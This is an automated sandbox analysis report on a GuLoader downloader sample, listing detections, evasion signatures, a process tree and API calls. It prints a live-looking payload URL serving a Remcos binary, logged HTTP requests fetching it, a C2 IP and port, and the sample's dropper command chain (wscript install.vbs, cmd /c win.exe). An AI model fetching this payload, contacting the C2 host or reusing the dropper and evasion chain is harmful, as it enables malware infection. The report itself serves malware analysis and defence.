Loading ...

Play interactive tourEdit tour

Analysis Report SecuriteInfo.com.__vbaHresultCheckObj.9138.5973

Overview

General Information

Sample Name:SecuriteInfo.com.__vbaHresultCheckObj.9138.5973 (renamed file extension from 5973 to exe)
Analysis ID:430702
MD5:6aa873ee68b60704e3d00f5c885a90f7
SHA1:c1a1601ce429cf7cb2d4c255325bf408fe69b1d5
SHA256:32dcdbac829f1b6607c1581488a6cf95541fba686f5f81c23b9e1e79761a971b
Tags:exe
Infos:

Most interesting Screenshot:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected GuLoader
C2 URLs / IPs found in malware configuration
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Hides threads from debuggers
Sigma detected: WScript or CScript Dropper
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to enumerate running services
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • SecuriteInfo.com.__vbaHresultCheckObj.9138.exe (PID: 5452 cmdline: 'C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exe' MD5: 6AA873EE68B60704E3D00F5C885A90F7)
    • SecuriteInfo.com.__vbaHresultCheckObj.9138.exe (PID: 768 cmdline: 'C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exe' MD5: 6AA873EE68B60704E3D00F5C885A90F7)
      • wscript.exe (PID: 5524 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs' MD5: 7075DD7B9BE8807FCA93ACD86F724884)
        • cmd.exe (PID: 4696 cmdline: 'C:\Windows\System32\cmd.exe' /c 'C:\Users\user\AppData\Roaming\win.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 4720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • win.exe (PID: 4976 cmdline: C:\Users\user\AppData\Roaming\win.exe MD5: 6AA873EE68B60704E3D00F5C885A90F7)
            • win.exe (PID: 4580 cmdline: C:\Users\user\AppData\Roaming\win.exe MD5: 6AA873EE68B60704E3D00F5C885A90F7)
  • win.exe (PID: 5864 cmdline: 'C:\Users\user\AppData\Roaming\win.exe' MD5: 6AA873EE68B60704E3D00F5C885A90F7)
    • win.exe (PID: 5160 cmdline: 'C:\Users\user\AppData\Roaming\win.exe' MD5: 6AA873EE68B60704E3D00F5C885A90F7)
  • win.exe (PID: 5848 cmdline: 'C:\Users\user\AppData\Roaming\win.exe' MD5: 6AA873EE68B60704E3D00F5C885A90F7)
    • win.exe (PID: 5280 cmdline: 'C:\Users\user\AppData\Roaming\win.exe' MD5: 6AA873EE68B60704E3D00F5C885A90F7)
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "http://ztechinternational.com/dk/Ose_2021%20remcos_UsrkxBzfYJ78.bin"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000011.00000002.481658634.00000000020A0000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000010.00000002.540773096.0000000002B40000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      00000014.00000000.436722263.0000000000560000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
        00000015.00000002.544208632.0000000000560000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          0000000F.00000002.481233554.00000000021F0000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
            Click to see the 6 entries

            Sigma Overview

            System Summary:

            barindex
            Sigma detected: WScript or CScript DropperShow sources
            Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (rule), oscd.community: Data: Command: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs' , CommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs' , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: 'C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exe' , ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exe, ParentProcessId: 768, ProcessCommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs' , ProcessId: 5524

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: 00000011.00000002.481658634.00000000020A0000.00000040.00000001.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "http://ztechinternational.com/dk/Ose_2021%20remcos_UsrkxBzfYJ78.bin"}
            Multi AV Scanner detection for domain / URLShow sources
            Source: gsyagvxnzmkoplbhduisbagtevcnxmzlopljdgye.ydns.euVirustotal: Detection: 10%Perma Link
            Multi AV Scanner detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Roaming\win.exeReversingLabs: Detection: 12%
            Multi AV Scanner detection for submitted fileShow sources
            Source: SecuriteInfo.com.__vbaHresultCheckObj.9138.exeVirustotal: Detection: 31%Perma Link
            Source: SecuriteInfo.com.__vbaHresultCheckObj.9138.exeReversingLabs: Detection: 12%
            Source: SecuriteInfo.com.__vbaHresultCheckObj.9138.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

            Networking:

            barindex
            C2 URLs / IPs found in malware configurationShow sources
            Source: Malware configuration extractorURLs: http://ztechinternational.com/dk/Ose_2021%20remcos_UsrkxBzfYJ78.bin
            Source: global trafficTCP traffic: 192.168.2.5:49719 -> 188.72.110.19:2177
            Source: Joe Sandbox ViewASN Name: TRABIAMD TRABIAMD
            Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
            Source: global trafficHTTP traffic detected: GET /dk/Ose_2021%20remcos_UsrkxBzfYJ78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: ztechinternational.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dk/Ose_2021%20remcos_UsrkxBzfYJ78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: ztechinternational.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dk/Ose_2021%20remcos_UsrkxBzfYJ78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: ztechinternational.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dk/Ose_2021%20remcos_UsrkxBzfYJ78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: ztechinternational.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dk/Ose_2021%20remcos_UsrkxBzfYJ78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: ztechinternational.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dk/Ose_2021%20remcos_UsrkxBzfYJ78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: ztechinternational.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dk/Ose_2021%20remcos_UsrkxBzfYJ78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: ztechinternational.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /dk/Ose_2021%20remcos_UsrkxBzfYJ78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: ztechinternational.comCache-Control: no-cache
            Source: unknownDNS traffic detected: queries for: ztechinternational.com
            Source: SecuriteInfo.com.__vbaHresultCheckObj.9138.exe, 00000007.00000002.350385300.0000000000560000.00000040.00000001.sdmp, win.exe, 00000015.00000002.544208632.0000000000560000.00000040.00000001.sdmp, win.exe, 00000016.00000002.581406039.0000000000560000.00000040.00000001.sdmpString found in binary or memory: http://ztechinternational.com/dk/Ose_2021%20remcos_UsrkxBzfYJ78.bin
            Source: SecuriteInfo.com.__vbaHresultCheckObj.9138.exe, 00000007.00000002.350529718.0000000000927000.00000004.00000020.sdmpString found in binary or memory: http://ztechinternational.com/dk/Ose_2021%20remcos_UsrkxBzfYJ78.binH
            Source: SecuriteInfo.com.__vbaHresultCheckObj.9138.exe, 00000007.00000002.350529718.0000000000927000.00000004.00000020.sdmpString found in binary or memory: http://ztechinternational.com/dk/Ose_2021%20remcos_UsrkxBzfYJ78.binz

            System Summary:

            barindex
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeProcess Stats: CPU usage > 98%
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A9AFE NtMapViewOfSection,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A0BF8 NtWriteVirtualMemory,TerminateProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A86C3 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A0703 EnumWindows,NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A5F4C NtAllocateVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A95F4 NtProtectVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A5224 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A52C4 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A4AE1 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A5310 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A9B14 NtMapViewOfSection,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A9B30 NtMapViewOfSection,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A9B58 NtMapViewOfSection,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A4B5F NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A9B54 NtMapViewOfSection,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A9B76 NtMapViewOfSection,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A538C NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A9BB0 NtMapViewOfSection,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A4BB4 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A53E8 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A9BE0 NtMapViewOfSection,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A5003 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A601C NtAllocateVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A4834 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A6074 NtAllocateVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A508A NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A4880 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A50C0 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A60F4 NtAllocateVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A4907 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A5110 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A6138 NtAllocateVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A5168 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A4970 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A51B0 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A49FC NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A4E38 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A463C NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A9E6C NtMapViewOfSection,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A4E78 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A4698 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A4EA7 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A4ED0 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A46E0 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A4F2C NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A8726 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A473C NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A4F55 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A4F79 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A5F80 NtAllocateVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A4FAC NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A47DA NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A9C08 NtMapViewOfSection,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A9C18 NtMapViewOfSection,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A4C44 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A9C50 NtMapViewOfSection,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A9C6C NtMapViewOfSection,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A1C7E NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A9C88 NtMapViewOfSection,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A9C98 NtMapViewOfSection,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A4CA4 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A9CB4 NtMapViewOfSection,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A9CDC NtMapViewOfSection,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A44FF NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A9CFC NtMapViewOfSection,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A5510 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A9D20 NtMapViewOfSection,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A4D36 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A4554 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A4D90 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A95AF NtProtectVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A8DBB NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A9DBC NtMapViewOfSection,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A4DD4 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 0_2_020A45F2 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00569AFE NtQueryInformationProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00560BF8 NtProtectVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_005695F4 NtProtectVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00565F4C NtAllocateVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00566074 NtAllocateVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_0056601C NtAllocateVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_005660F4 NtAllocateVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00566138 NtAllocateVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00569B54 NtQueryInformationProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00569B58 NtQueryInformationProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00569B76 NtQueryInformationProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00569B14 NtQueryInformationProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00569B30 NtQueryInformationProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00569BE0 NtQueryInformationProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00569BB0 NtQueryInformationProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00569C50 NtQueryInformationProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00569C6C NtQueryInformationProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00569C18 NtQueryInformationProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00569C08 NtQueryInformationProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00569CDC NtQueryInformationProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00569CFC NtQueryInformationProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00569C98 NtQueryInformationProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00569C88 NtQueryInformationProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00569CB4 NtQueryInformationProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00569D20 NtQueryInformationProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_0056158E NtProtectVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_005615BC NtProtectVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00569DBC NtQueryInformationProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_005695AF NtProtectVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00561670 NtProtectVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00569E6C NtQueryInformationProcess,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00561604 NtProtectVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.__vbaHresultCheckObj.9138.exeCode function: 7_2_00565F80 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F9AFE NtResumeThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F0BF8 NtWriteVirtualMemory,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F86C3 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F0703 EnumWindows,NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F5F4C NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F95F4 NtProtectVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F5224 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F52C4 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F4AE1 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F9B14 NtResumeThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F5310 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F9B30 NtResumeThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F4B5F NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F9B58 NtResumeThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F9B54 NtResumeThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F9B76 NtResumeThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F538C NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F4BB4 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F9BB0 NtResumeThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F53E8 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F9BE0 NtResumeThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F601C NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F5003 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F4834 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F6074 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F508A NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F4880 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F50C0 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F60F4 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F5110 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F4907 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F6138 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 15_2_021F4970 NtWriteVirtualMemory,
